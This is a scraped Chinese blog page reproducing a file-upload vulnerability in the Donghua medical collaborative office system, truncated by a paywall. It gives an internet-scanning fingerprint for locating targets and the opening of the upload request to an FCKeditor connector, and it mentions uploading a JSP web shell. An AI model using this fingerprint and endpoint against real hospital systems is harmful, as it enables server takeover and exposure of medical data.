【漏洞复现】东华医疗协同办公系统文件上传漏洞

最新推荐文章于 2024-07-12 10:43:26 发布
最新推荐文章于 2024-07-12 10:43:26 发布
阅读量1.3k 收藏 8
点赞数 37
分类专栏: 漏洞复现 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45530380/article/details/135337239
版权
本文详细介绍了东华医疗协同办公系统的一个文件上传漏洞,通过资产测绘和漏洞复现过程,展示了如何利用该漏洞。复现部分提供了一个shell链接指向已上传的123.jsp文件。
摘要由CSDN通过智能技术生成

文章目录

漏洞描述

东华医疗协同办公系统是专为医疗机构设计的一套综合性办公管理软件,旨在提升医疗机构内部协同工作效率。该系统集成了日常办公所需的各种功能模块,包括日程管理、会议管理、文件共享、任务分配等,实现了信息的集中管理和统一协作平台。通过该系统,医疗机构内的医生、护士、行政人员等可以方便地进行跨部门沟通和协作,快速共享和处理信息,提高工作效率。此外,东华医疗协同办公系统还具备数据安全保障机制,确保敏感信息的安全性和保密性。它还支持移动端访问,方便用户随时随地进行办公操作。通过这个系统,东华医疗机构能够建立高效的协同工作环境,提升整体运营效能。

资产测绘

FOFA:body="skin/charmBlue/css/dialog.css"

漏洞复现

POST /common/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=&CurrentFolder=/ HTTP/1.1
Host: xx.xx.xx.xx
Cookie: JSESSIONID=17A17E4D9E4E38B72D650895AFF7D1DF
Content-Length
最低0.47元/天 解锁文章
新疆东坡肉
关注
  • 37
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
东华医疗协同办公系统 文件上传漏洞复现
0xSec
12-29 1457
东华医疗协同办公系统 connector接口处存在任意文件上传漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
漏洞复现东华**协同办公系统反序列化漏洞
weixin_45530380的博客
01-03 749
@d_base64>参数中 base64编码为内存马payload。
[zkaq靶场]命令执行--IBOS协同办公系统通杀漏洞
wwxxee
05-11 1821
命令执行 命令执行相关函数 system() 能够将字符串作为OS命令执行,自带输出功能。 exec() 将字符串作为OS命令执行,需要输出 shell_exec() 将字符串作为OS命令执行,需要输出 passthru() 能够将字符串作为OS命令执行,自带输出 popen() 将字符串作为OS命令执行,但是该函数返回一个文件指针。 反引号`` 反引号内的字符串也会被解析成OS命令。 靶场 本地测试 本期主角:ibos(一款协同办公系统) 版本:4.5.5 安装: 安装完成之后
东华软件反统方:一个能扼住医疗信息泄露咽喉的解决方案
weixin_34365635的博客
08-01 652
【51CTO.com原创稿件】在很多IT厂商眼中,医疗行业是一个让人既爱又怵的香饽饽:这个市场蕴藏着庞大的待开发IT商机,然而倘若没有对这个行业的特殊性有着深入理解,就无法制定出令用户满意的解决方案。正所谓危机与商机并存,遗憾的是不少IT厂商都在医疗行业沉戟落沙。 东华软件算是活跃在医疗行业的老牌IT厂商了,进入医疗行业市场已经有10年之久,对这个行业信...
然之协同系统漏洞利用汇总
vspiders的博客
03-21 4610
Author:Vspiders首发地址:https://xianzhi.aliyun.com/forum/topic/2135前言前段时间在做然之协同系统代码审计,这里做个简单的总结。第一弹:SQL注入漏洞0x01 注入漏洞分析问题出现在/lib/base/dao/dao.class.php文件中的orderBy函数中,public function orderBy($order) { i...
操作系统课程设计报告(文件系统)
热门推荐
weixin_44203971的博客
01-11 1万+
1.引言 随着计算机技术的快速发展,在计算机操作系统中,如何优化任务处理效率成为一大难题。通过一个简单多用户文件系统设计,加深对文件系统的理解及内部实现。运用多线程的调度尽可能的优化其效率,解决实际问题。 1.1任务要求 B类:用java语言模仿“生产者——消费者”问题 1.通过Java语言中的wait()和notify()命令模拟操作系统中的P/V操作; 2.为每个生产者/消费者产生一个线程,设...
东华软件智慧医疗解决方案.pptx
05-23
智慧医疗致力于打造个人健康管理的服务平台,为终端用户和医疗机构之间搭建起沟通的桥梁。 平台的一侧整合现有的医疗资源,提供专业医疗健康服务;另一侧是终端用户,他们可灵活地通过无线或有线的方式接入,实时...
东华医疗软件系统集成解决方案(RIS 部分)(3) 2.doc
08-10
东华医疗软件系统集成解决方案(RIS 部分)》文档主要阐述了东华医疗软件在集成RIS(Radiology Information System,放射科信息系统)时的技术规范和业务流程,旨在确保系统间交互的稳定性和实时性。以下是文档中...
东华数字医疗解决方案
11-27
东华数字医疗解决方案,详细介绍东华软件的医疗信息系统解决方案
东华大学操作系统-罗辛
09-23
上课时根据视频和课件整理出来的思维导图,之后还做了一些增添和删改,分享出来给大家,不知道说啥了,给大家拜个早年
HIS系统东华、天健表结构及实施计划
07-08
东华和天健是两家在中国医疗信息化领域知名的供应商,它们提供的HIS系统在行业内有着广泛的应用。下面我们将深入探讨HIS系统的基础知识,特别是东华和天健的表结构以及实施计划。 一、HIS系统概述 HIS系统主要包括...
网络安全的神秘世界】XSS基本概念和原理介绍
weixin_54750312的博客
07-09 868
恶意攻击者往web页面插入恶意代码脚本(JS代码),当用户浏览该页面时,嵌入web里面的JS代码会被执行,从而达到恶意攻击用户的目的。也叫持久型,常见的就是在博客留言版、反馈投诉、论坛评论等位置,将恶意代码和正文都存入服务端,每次访问都会触发恶意代码。我们可以构造恶意代码,观察远程服务器web日志,只要网站管理员访问,它的cookie值就被盗取。发现恶意代码被浏览器保存到页面了,访问其他网页再回来,仍会造成攻击,这就叫持久型。像刚才的攻击流程,攻击一次立马失效,这就叫非持久型。
解读网络安全公司F5:助企业高效简化多云和应用部署
hanniuniu13的博客
07-09 410
在全球迈入数字时代和深入推进产业数智化的当下,F5在全球确立了应用交付、现代应用、应用安全、分布式云四个战略业务方向后,F5一直在积极推进该项战略在中国的落地。、简化已有的网络战略的具体实践中,F5与WWT和Google Cloud合作,利用解决方案帮助客户在多云环境中管理错综复杂的应用交付和安全问题。在WWT的实施支持和Google Cloud的基础设施基础之上,再运用F5提供的安全解决方案,让企业在过渡到云环境并在云环境中扩展时,能够保持一致的安全措施和卓越的用户体验。
网络安全(黑客)自学
白帽子凯哥聊黑客
07-02 1292
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
中职网络安全B模块渗透测试server2003
网络安全技术分享
07-09 860
将sam.hive和system.hive文件复制到win7的c盘根目录然后使用mimikatz工具提取。使用nmap扫描发现目标靶机开放端口232疑似telnet直接进行连接测试成功。
网络安全-内网安全加固方案
最新发布
PanDD_0_1的博客
07-12 780
网络安全-内网安全
网络安全防御【防火墙安全策略用户认证综合实验】
miss_copper的博客
07-10 1285
先新建一个管理员角色(网络安全管理员):再新建一个管理员(用户名密码自拟):至此本实验全部结束!!!
网络设备安全
weixin_48579910的博客
07-11 926
交换机作为网络核心设备,其安全性直接影响到整个网络的稳定和安全。通过实施身份验证和访问控制、设备配置安全、VLAN安全、ARP欺骗防护、MAC地址安全、DHCP欺骗防护、STP安全、拒绝服务防护以及固件和软件更新等措施,可以有效防范各种安全威胁。结合使用适当的安全工具和技术,组织可以大幅提高其交换机的安全防护能力,保护网络基础设施和数据的安全。定期进行安全审计和更新,确保交换机和网络始终处于最佳安全状态。确保路由器的安全是保护整个网络基础设施和数据传输安全的关键。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值